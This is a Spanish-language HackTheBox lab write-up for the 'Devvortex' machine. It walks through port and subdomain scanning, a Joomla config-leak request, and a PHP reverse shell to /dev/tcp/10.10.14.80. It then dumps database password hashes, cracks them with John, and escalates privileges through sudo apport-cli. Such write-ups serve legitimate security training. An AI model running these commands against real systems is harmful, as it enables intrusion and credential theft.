🌐
My Pentest Book
  • πŸ’‘I changed my website
  • πŸ“„WriteUps
    • πŸ΄β€β˜ οΈHTB - HackTheBox
      • ⬛HTB - Advanced Labs
        • Endgames
          • P.O.O.
      • 🟨HTB - Runner
      • 🟩HTB - Usage
      • 🟩HTP - Active (Incomplete)
      • 🟨HTB - Scrambled
      • πŸŸ₯HTB - FormulaX (Incomplete)
      • πŸŸ₯HTB - Office
      • 🟩HTB - Perfection
      • 🟨HTB - WifineticTwo
      • 🟨HTB - Jab (Incomplete)
      • 🟩HTB - Buff
      • 🟨HTB - Hospital
      • 🟩HTB - Crafty
      • 🟩HTB - Bizness
      • 🟩HTB - Devvortex
      • 🟩HTB - CozyHosting
      • 🟩HTB - Analytics
      • 🟩HTB - Codify
      • 🟨HTB - Surveillance
      • 🟨HTB - Monitored
Con tecnologΓ­a de GitBook
En esta pΓ‘gina
  • InformaciΓ³n General
  • Enumeration
  • Exploitation
  • Privilege Escalation

ΒΏTe fue ΓΊtil?

Editar en GitHub
  1. WriteUps
  2. HTB - HackTheBox

HTB - Devvortex

https://app.hackthebox.com/machines/Devvortex

AnteriorHTB - BiznessSiguienteHTB - CozyHosting

Última actualización hace 1 año

ΒΏTe fue ΓΊtil?

InformaciΓ³n General

  • Nombre de la MΓ‘quina: Devvortex

  • IP de la MΓ‘quina: 10.10.11.242

  • Sistema Operativo: Linux

  • Dificultad: Easy

  • Fecha de PublicaciΓ³n: 25 nov 2023


Enumeration

Establecer el objetivo

Primero, establecemos el objetivo utilizando el comando settarget con la direcciΓ³n IP de la mΓ‘quina objetivo:

settarget 10.10.11.242

Ping de reconocimiento

Realizamos un ping a la mΓ‘quina objetivo para verificar la conectividad y obtener informaciΓ³n sobre la ruta utilizando la opciΓ³n -R para incluir la ruta de retorno:

ping -c 1 10.10.11.242 -R

Escaneo de puertos con Nmap

Luego, realizamos un escaneo de puertos utilizando Nmap para identificar los puertos abiertos en la mΓ‘quina objetivo. Utilizamos las opciones -p- para escanear todos los puertos, --open para mostrar solo los puertos abiertos, -sS para un escaneo de tipo TCP SYN, --min-rate 5000 para establecer la velocidad mΓ­nima de paquetes y -vvv para un nivel de verbosidad alto. AdemΓ‘s, utilizamos -n para desactivar la resoluciΓ³n de DNS, -Pn para no realizar el escaneo de ping, y -oG allPorts para guardar la salida en un archivo con formato Greppable:

sudo nmap -p- --open -sS --min-rate 5000 -vvv  -n -Pn 10.10.11.242 -oG allPorts

Escaneo detallado con Nmap

Posteriormente, realizamos un escaneo mΓ‘s detallado de los puertos identificados utilizando la opciΓ³n -sCV para detecciΓ³n de versiones y scripts de enumeraciΓ³n de servicios. EspecΓ­ficamente, indicamos los puertos a escanear con -p __PORTS__ (reemplazando __PORTS__ con los puertos identificados en el paso anterior) y guardamos la salida en un archivo de texto con el nombre targeted:

sudo nmap -sCV -p22,80 10.10.11.242 -oN targeted
cat targeted -l java

Para aΓ±adir la entrada "10.10.11.242 devvortex.htb" al archivo /etc/hosts, puedes usar el siguiente comando en la terminal:

echo "10.10.11.242 devvortex.htb" | sudo tee -a /etc/hosts

Este comando aΓ±ade la direcciΓ³n IP 10.10.11.242 asociada al nombre de host devvortex.htb al archivo /etc/hosts de tu sistema.

Para realizar un descubrimiento de directorios en un sitio web utilizando Gobuster, puedes utilizar el siguiente comando:

gobuster dir -u http://devvortex.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50

Pero despuΓ©s de un rato nos damos cuenta que no encontramos nada util, por lo que continuamos buscando subdominios:

gobuster dns -d devvortex.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 50

Agregamos la nueva ruta al hosts...

echo "10.10.11.242 dev.devvortex.htb" | sudo tee -a /etc/hosts

Y gracias al robots.txt sabemos que es Joomla

Exploitation

curl "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" | jq .

Ahora que estamos dentro, lo que buscamos es lograr ejecutar una reverse shell editando algun archivo con el editor de Joomla.

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.80/8080 0>&1'");

Luego ejecutamos /administrator/atum/index.php mientras tenemos nc a la escucha...

Podemos mejorar la UX de nuestra shell:

script /dev/null -c /bin/bash 
stty raw -echo; fg
export TERM=xterm

Descubrimos que las credenciales para ingresar a la base de datos son las mismas por lo que nos ponemos a curosear:

 mysql -u lewis -p
 Password: P4n*****r3c0n##
show databases;
use joomla;
select * from sd4fg_users;

Intentamos crackear con John... descubriendo la contraseΓ±a (teq******cho)

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Privilege Escalation

Ya dentro de nuestra shell, ejecutamos como siempre sudo -l

Al parecer al abrir un reporte podemos bypassear y llegar a ser root. Me doy cuenta que en mi caso no tengo ningΓΊn reporte por lo que debo primero crear uno:

Luego vemos el reporte y inyectamos nuestro "!/bin/bash" para byppasear.

Buscamos en internet y nos encontramos que podrΓ­a ser vulnerable al CVE-2023-23752 ()

Esto quiere que podria correr /usr/bin/apport-cli con sudo, buscando en internet veo que es un CVE ().

πŸ“„
πŸ΄β€β˜ οΈ
🟩
https://www.exploit-db.com/exploits/51334
https://github.com/diego-tella/CVE-2023-1326-PoC
Ingresando con credenciales obtenidas